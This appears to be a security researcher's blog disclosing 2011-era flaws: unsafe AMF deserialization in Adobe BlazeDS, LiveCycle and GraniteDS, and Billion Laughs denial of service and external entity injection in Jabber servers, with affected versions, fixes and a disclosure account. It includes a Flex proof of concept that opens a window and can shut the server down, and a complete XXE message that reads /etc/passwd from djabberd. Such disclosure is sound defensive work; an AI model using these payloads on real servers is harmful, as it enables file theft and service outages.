This vulnerability is a design flaw in how Adobe LiveCycle, Adobe BlazeDS and GraniteDS handle the AMF protocol, that can be exploited resulting in arbitrary code execution.

The basis of how the deserialization of AMF data works, is that the data contains a class name, names of properties, and values for those properties. The application then creates an instance of that class by calling its constructor (without arguments), and using the Java beans conventions for getters and setters to set the properties in that newly created object.

That basic idea is already the security vulnerability. It does not put any limitation on which classes a client can cause to be instantiated (besides that they need a constructor without arguments), and which getters and setters on it may be called. It can be classes that have nothing to do with BlazeDS/GraniteDS or the services being exposed, but just happen to be available on the same server. For most classes this is safe. Constructors, getters, and setters usually don’t have extra side-effects outside of the objects they’re being called on. But there is no rule anywhere saying that that must always be the case; and in many applications there are classes available where calling the right setters leads to running arbitrary code.

Affected

• Adobe LiveCycle Data Services 3.1, 2.6.1, 2.5.1 and earlier versions
• Adobe LiveCycle 9.0.0.2, 8.2.1.3, 8.0.1.3 and earlier versions
• Adobe BlazeDS 4.0.1 and earlier versions
• GraniteDS Data Services 2.2.0 and earlier versions

Solution

• Security updatefor LiveCycle Data Services, LiveCycle ES, and BlazeDS
• Granite Data Services 2.2.1 GA

Note that for BlazeDS upgrading to the new version is not enough. You also need to configure the DeserializationValidator (as explained in blz401_hf_21287.txt included in the hotfix), otherwise you are still vulnerable.
For BlazeDS 3.x, Adobe will not release a fix, but the changes have been backported, so you can grab BlazeDS 3 nightly build 3.3.0.20931.

Theoretical example exploit

Suppose in some application or library, there is a class with the following code:

public class Foo {
   public void setBar(String bar) throws IOException {
      Runtime.getRuntime().exec(bar);
   }
}

That class itself is not a security problem. In any Java application not using BlazeDS, this is perfectly safe code. But if it is available in the classpath of BlazeDS, it can be abused to execute any command, by sending (the binary AMF representation of) an object of this class with a “bar” attribute.

That’s a forced example. In the real world, such obvious exploits usually aren’t available. It just takes a bit more effort…

JFrame exploit

This exploit does not result in arbitrary code execution, but it’s a cute little example, in the Java library itself, just to show you a real-world case.

JFrame is the base class for windows shown on the screen in Swing. Sending an object with class “javax.swing.JFrame” and setting “visible” to “true” shows an actual window on the server running BlazeDS. As a bonus, the “defaultCloseOperation” could be set to 3 (EXIT_ON_CLOSE) so that if the window would be closed, the BlazeDS server exits. Some other stuff could be put in this window, but what can be shown and the behaviour the attacker can choose is quite limited (because of only being able to use getters and setters).

Sample Flex exploit code:

[RemoteClass(alias="javax.swing.JFrame")]
public class JFrame {
   public var title:String = "Gotcha!";
   public var defaultCloseOperation:int = 3;
   public var visible:Boolean = true;
}

Arbitrary code execution

There exists an exploit that will work in many BlazeDS/GraniteDS applications, that leads to arbitrary code execution. But I’m not making that one public yet.

[Edit 17/6: added note about the fix for BlazeDS]

1. Jabber/XMPP is an XML-based protocol used mainly for instant messaging
2. The Billion laughs attack is a type of denial-of-service vulnerability in XML parsers, known since at least 2002. There have already been multiple security advisories about it.

It’s surprising that in all that time nobody put one and two together. There isn’t any extra trick needed to combine them. Every jabber implementation that I tested is vulnerable. If they receive the well-known exploit, they will hang. No authentication required.

If you are running one of these, it’s best to upgrade to a fixed version as soon as it becomes available.

If you develop another application that receives XML from an untrusted party, this would be a good time to check if your application isn’t vulnerable too.

Affected software

• ejabberd: fixed in 2.1.7, CVE-2011-1753
• jabberd14: CVE-2011-1754
• jabberd2: fixed in 2.2.14, CVE-2011-1755
• citadel: fix not released yet? CVE-2011-1756
• djabberd: no fix available yet CVE-2011-1757
• prosody: fixed in 0.8.1, CVE-2011-2205
  
  LuaExpat 1.2.0 was released, to make make it possible for prosody to block the attack: CVE-2011-2188
• Cisco Jabber Extensible Communications Platform and Cisco Unified Presence: fixed, CVE-2011-3287/CVE-2011-3288 [added 2011-09-29, not discovered by me]

(Un)coordinated release

Thanks to the help of the Debian security team, this was reported to a list of linux distributions and the authors of all those clients on April 27. It came with a proposed embargo, to not publish anything regarding this (including fixes in
public rcs repositories) issue before 31.05.2011. With such a trivial exploit and so many different parties affected without a fix available, it would take only one idiot to take down most of the jabber network. So waiting a bit for a coordinated release was the responsible thing to do.
That didn’t go entirely as planned.

The Citadel developers decided to ignore that: without explaining their reasons, they fixed it publically immediately.

It’s not that big of a deal. The chance of someone trigger-happy seeing the commit was low, and it is just a denial of service. But a vendor not following responsible disclosure when the reporter asks for it seems a bit backwards. To me this means that they’ve lost their privilege to get vulnerability information before public release. Ironically, that might mean that patching earlier made their users less secure.

At the day of the coordinated release, I discovered that djabberd was also vulnerable to external entity injection (see below).
And bit later, it turned out that our messages never reached the new djabberd maintainers.
And we forgot to warn Prosody. Sorry.

External entity injection

Additionally, djabberd is also vulnerable to external entity injection (CVE-2011-2206). That allows an attacker to remotely read files on the server. This got fixed in djabberd 0.85.

The easiest way to exploit it is to log in and send a message containing the entity to yourself:

<?xml version="1.0"?>
<!DOCTYPE root [
   <!ENTITY a SYSTEM "file:///etc/passwd">
]>
<stream:stream xmlns:stream="http://etherx.jabber.org/streams" xmlns="jabber:client" to="example.com">

<iq type="set" to="example.com" id="auth_2">
   <query xmlns="jabber:iq:auth">
      <username>example</username>
      <password>example</password>
      <resource>exploit</resource>
   </query>
</iq>                                                                                                                                              

<presence />                                                                                                                                       

<message type="chat" to="example@example.com" id="123">
   <body>&a;</body>
</message>